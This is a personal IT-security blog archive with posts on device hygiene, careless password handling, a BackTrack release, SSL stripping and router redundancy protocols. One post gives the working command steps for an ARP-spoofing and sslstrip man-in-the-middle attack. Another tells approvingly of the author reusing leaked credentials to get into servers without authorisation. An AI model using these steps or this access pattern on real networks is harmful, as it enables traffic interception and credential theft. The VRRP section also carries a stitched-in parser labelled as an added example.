Blog Archives

Security¿?

I was thinking today about security. On the way to work I usually read a book that talks about it. My mind is becoming paranoid. Before, I was working at a remote site far away from the crowded city, but now the situation is different. I am in a big city. When I'm going to work I see a lot of people with laptops, smartphones, tablets… and I only think about security.

Are all of those devices really secured? I'd like to think that at least the professionals have a device that is 100% secured. When I say secured… at least have an antivirus and a password to unlock the device, or a password and some kind of encryption.

I believe that all the other devices, those of teenagers and of people who are not using the technology for work, are not so protected. I saw some people unlocking the screen with a numeric code (that is good) and also with a pattern, which is not so good (basically because if you hold the phone against the light you can see the pattern).

With a simple test you could figure out how many devices are running with an open window; by that I mean with Bluetooth or wireless active. I know that for most of them it is better to keep the connections active because they save the 5 seconds it takes to activate them (aaahhhhh!!!).

I'm remembering my days as an administrator:

Me: – (looking away from the keyboard), please type your password.

User: – I wrote my user and pass for you on a piece of paper. I'm going to put some order here in the office.

Me: …..LOL!

Back to handheld devices: there are many kinds of attacks on smartphones that could be used with bad intentions. There are tons of stupid apps that people download and never update. This kind of app is a good starting point for exploitation.

Just some security advice:

  1. Put a password on your device (laptop, tablet, smartphone) to unlock it. You could forget it in a public place and anyone could snoop through your personal data.
  2. Don't save passwords. If someone gets access to your device he could spend some time on eBay with your account.
  3. If you keep your passwords there, use software to encrypt the password database.
  4. Don't use weak passwords like…. “123456”.

When you go to the ATM, you usually cover the keypad to avoid watchers. In the same way, when you unlock your device or read an email, try to do the same.

A good idea is using polarised (privacy) screen covers.

:))

Security? No, please!

In the last couple of months I have been working in different scenarios and I notice that people are not taking care of some basic security aspects.

For example:

  • We were working on a network issue. An engineer was asked to check a server log. After a few seconds this person wrote in a multi-user chat conversation: “C0n$0le7” :S . To hide this big mistake, he then wrote “fjkfslfadslfjsljf”. Because I'm just curious, I decided to check from my computer whether I could access this server. It was not so difficult to gain access. I set myself a reminder to try again the day after, and this guy had not changed the password; 1 week later the password is still the same!!!!!

  • Another example. 01:00 am, another network incident. I was on-call and this was the situation:

PersonA: “We have problem in this device, could you please help us?”.

Me: “We are not supporting this device, could you please call the people in charge?”

PersonA: “Could you please help us anyway….?”

Me: “I don't have rights to access this device”

PersonA: “I already sent you an email with the root account”

Me: :S

PersonA: Please.

Me: Let me try….

……….

After some checks…. done!

PersonA: Thank you. 

Me: No problem

I set myself a reminder to check this password some weeks later and….. babum!! it still works!!

 
  • Scenario 3. During another issue, in which I was trying to explain to the engineer in charge of a server how to configure the server…. (yes, it is true!!), I asked him for a user and password to do some tests with a test user. This guy told me: “Use mine, but please don't share it with anyone”. This was 6 months ago and still today I can access this server!!!!!

BackTrack 4 R1

The new BackTrack 4 Revision 1 is available to download.

New in this version:

* New kernel 2.6.34 to improve hardware compatibility and performance.
* All tools updated.
* New tool called “dragon” that allows the user to modify BackTrack options from the command line.
* Added the option to replace the KDE environment with Fluxbox, offering a faster and more fluid environment.
* Implemented the rt28xx driver for Alfa AWUS050NH cards.
* If you download the VMware version, VMware Tools are integrated.

This is the final version of BackTrack 4 R1.
Please download it and test it!!!

Direct Downloads:

ISO Version

http://www.backtrack-linux.org/download.php?fname=bt4r1

VMware version

http://www.backtrack-linux.org/download.php?fname=bt4r1vm

Torrent Downloads:

ISO Version

http://www.offensive-security.com/bt4-r1.iso.torrent

VMware version

http://www.offensive-security.com/bt4-r1-vm.tar.bz2.torrent

“Secure” Socket Layer (SSL)

Are you really sure that SSL connections are strong? I mean, that nobody can intercept your traffic, your passwords or even your bank account number. SSL is one of the world's most important encryption protocols, used for VPNs too.

There is a tool (sslstrip) whose author claims to have used it to steal data from the most important and “safe” websites. This man is Moxie, a recognized security consultant.

Configuring SSL-Strip

1st – Enable IP forwarding

echo 1 > /proc/sys/net/ipv4/ip_forward

2nd – Perform a man-in-the-middle ARP attack

arpspoof -i eth0 -t VICTIM

3rd – Redirect traffic through iptables

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

4th – Start sslstrip on the port used for the redirect (8080 by default)

python sslstrip.py -w archivo

Moxie’s website: http://www.thoughtcrime.org

High availability

I am passionate about security. First I would like to think about the concept.

What does “high availability” mean?

For example:

You are responsible for a small network and you have a spare server, router, switch and some computers. This cannot be considered high availability because it is not efficient: someone has to swap the hardware in by hand. High availability would be having two routers configured so that, in case one breaks, all traffic is routed by the other one. The administrator should receive an alarm and the broken appliance should be replaced. This can be a “basic” scenario. It is the same for servers and switches.

Best scenario could be:

* Two different Internet providers.

* A pair of good routers, each one with redundant power and configured with the HSRP, VRRP or GLBP protocols.

* A server cluster environment to survive a failure in the system.

* All devices should be connected to separate power lines.

* A UPS (SAI) should protect the core of the company.

If finally all of the above can be duplicated in another office…. it means that the information you are handling is toooooo important 😉

I do not know if I have skipped any concept.

This is the theory, but it depends on the needs of the company. If the company can accept an hour or a day of lost service, then all these measures are not necessary. However, if the company sells articles on a website, each minute is important because every minute down is a bad service for the customer.

There are other extreme cases. I read a whitepaper in which the author was talking about the systems used by the military in aircraft. The systems used to control these jets are the best redundancy example: they use 3 different systems with 3 different architectures and 3 different operating systems. He did not talk about power, but I think that is redundant too 😉

Now let's start to talk about redundancy protocols.

Hot Standby Router Protocol (HSRP). Provides default gateway redundancy using one active and one standby router. That means one router carries all the load and, in case it fails, the standby router becomes the active router. When the service is re-established, it goes back to being the standby router, as before. HSRP sends its hello messages by multicast to the address 224.0.0.2 using UDP port 1985, to the other HSRP-enabled routers, establishing the priority between the routers. The primary router, with the highest configured priority, acts as a virtual router with a pre-defined gateway IP and responds to ARP requests from machines connected to the LAN with the MAC address 0000.0c07.acXX, where XX is the group ID in hex. If the primary router fails, the router with the next-highest priority takes over the gateway IP and answers ARP requests with the same MAC address, thus achieving transparent default-gateway fail-over.

HSRP and VRRP are not routing protocols as they do not advertise IP routes or affect the routing table in any way.

HSRP and VRRP on some routers have the ability to trigger a failover if one or more interfaces on the router go down. This can be useful for dual branch routers each with a single serial link back to the head end. If the serial link of the primary router goes down, you would want the backup router to take over the primary functionality and thus retain connectivity to the head end.

Virtual Router Redundancy Protocol (VRRP). An open-standard alternative to Cisco's HSRP, providing the same functionality. It is designed to increase the availability of the default gateway serving hosts on the same subnet. This increased reliability is achieved by advertising a “virtual router” (an abstract representation of master and backup routers acting as a group) as the default gateway to the hosts instead of one physical router. Two or more physical routers are then configured to stand for the virtual router, with only one doing the actual routing at any given time. If the physical router that is currently routing the data on behalf of the virtual router fails, another physical router automatically replaces it. The physical router that is currently forwarding data on behalf of the virtual router is called the master router. Physical routers standing by to take over from the master router in case something goes wrong are called backup routers.

A virtual router must use 00-00-5E-00-01-XX as its Media Access Control (MAC) address. The last byte of the address (XX) is the Virtual Router IDentifier (VRID), which is different for each virtual router in the network. This address is used by only one physical router at a time, and that router replies with this MAC address when an ARP request is sent for the virtual router's IP address. Physical routers within the virtual router must communicate among themselves using packets with multicast IP address 224.0.0.18 and IP protocol number 112.

Routers have a priority between 1 and 255, and the router with the highest priority becomes the master. When a planned withdrawal of a master router is to take place, its priority can be lowered, which means a backup router will pre-empt the master rather than having to wait for the hold time to expire. This reduces the black-hole period.
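To make the VRRP facts above concrete (virtual MAC 00-00-5E-00-01-XX derived from the VRID, priority 1-255, highest priority becomes master), here is an added example that is not part of the original post: it builds constructed VRRPv2 advertisements, parses them, verifies the checksum and elects the master. The byte layout follows RFC 3768, which the post does not cite; everything else is assumed sample data.

```python
import struct
from dataclasses import dataclass

VRRP_MCAST, VRRP_PROTO = "224.0.0.18", 112   # where advertisements travel (from the post)

@dataclass
class Advert:
    vrid: int
    priority: int
    adver_int: int
    addrs: list
    checksum_ok: bool

def inet_checksum(data: bytes) -> int:
    """One's-complement Internet checksum; the checksum field must be zeroed first."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def build_advert(vrid: int, priority: int, addrs: list, adver_int: int = 1) -> bytes:
    """Constructed VRRPv2 advertisement (RFC 3768 layout), used only as sample input."""
    body = b"".join(bytes(int(o) for o in a.split(".")) for a in addrs)
    # version 2 | type 1, VRID, priority, IP count, auth type 0, adver interval, checksum 0
    hdr = struct.pack("!BBBBBBH", 0x21, vrid, priority, len(addrs), 0, adver_int, 0)
    pkt = hdr + body + b"\x00" * 8                 # 8 bytes of (unused) auth data
    return pkt[:6] + struct.pack("!H", inet_checksum(pkt)) + pkt[8:]

def parse_advert(pkt: bytes) -> Advert:
    """Decode the header and advertised IPs, then recompute the checksum."""
    ver_type, vrid, prio, n, _auth, adv, csum = struct.unpack("!BBBBBBH", pkt[:8])
    if ver_type != 0x21:
        raise ValueError("not a VRRPv2 advertisement")
    addrs = [".".join(str(b) for b in pkt[8 + 4 * i:12 + 4 * i]) for i in range(n)]
    ok = inet_checksum(pkt[:6] + b"\x00\x00" + pkt[8:]) == csum
    return Advert(vrid, prio, adv, addrs, ok)

def virtual_mac(vrid: int) -> str:
    """VRRP virtual MAC 00-00-5E-00-01-XX, XX = VRID (HSRP's equivalent is 0000.0c07.acXX)."""
    return "00-00-5E-00-01-%02X" % vrid

def elect_master(adverts: list) -> Advert:
    """Highest valid priority wins; priority 0 (master stepping down) and bad checksums
    are ignored. Real VRRP breaks ties on the sender's primary IP from the IP header."""
    valid = [a for a in adverts if a.checksum_ok and 1 <= a.priority <= 255]
    return max(valid, key=lambda a: a.priority)

if __name__ == "__main__":
    pkts = [build_advert(7, 100, ["192.0.2.1"]), build_advert(7, 200, ["192.0.2.1"])]
    master = elect_master([parse_advert(p) for p in pkts])
    print("master priority", master.priority, "answers ARP with", virtual_mac(master.vrid))
```

A defender can run the same parser over advertisements seen on 224.0.0.18 and alert when a higher-priority advert appears from a router that is not supposed to be in the group.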

Gateway Load Balancing Protocol (GLBP). Supports arbitrary load balancing in addition to redundancy across gateways. It is a Cisco proprietary protocol that attempts to overcome the limitations of existing redundant router protocols by adding basic load balancing functionality.

In addition to being able to set priorities on different gateway routers, GLBP also allows a weighting parameter to be set. Based on this weighting (compared to others in the same virtual router group), ARP requests will be answered with MAC addresses pointing to different routers. Thus, load balancing is not based on traffic load, but rather on the number of hosts that will use each gateway router. By default GLBP load balances in round-robin fashion.

GLBP elects one AVG (Active Virtual Gateway) for each group. The other group members act as backups in case of AVG failure. If there are more than two members, the second-best AVG is placed in the Standby state and all other members are placed in the Listening state. This is monitored using hello and holdtime timers, which are 3 and 10 seconds by default. The elected AVG then assigns a virtual MAC address to each member of the GLBP group, including itself, thus enabling AVFs (Active Virtual Forwarders). Each AVF assumes responsibility for forwarding packets sent to its virtual MAC address. There can be up to four active AVFs at the same time.

By default, GLBP routers use the local multicast address 224.0.0.102 to send hello packets to their peers every 3 seconds over UDP 3222 (source and destination).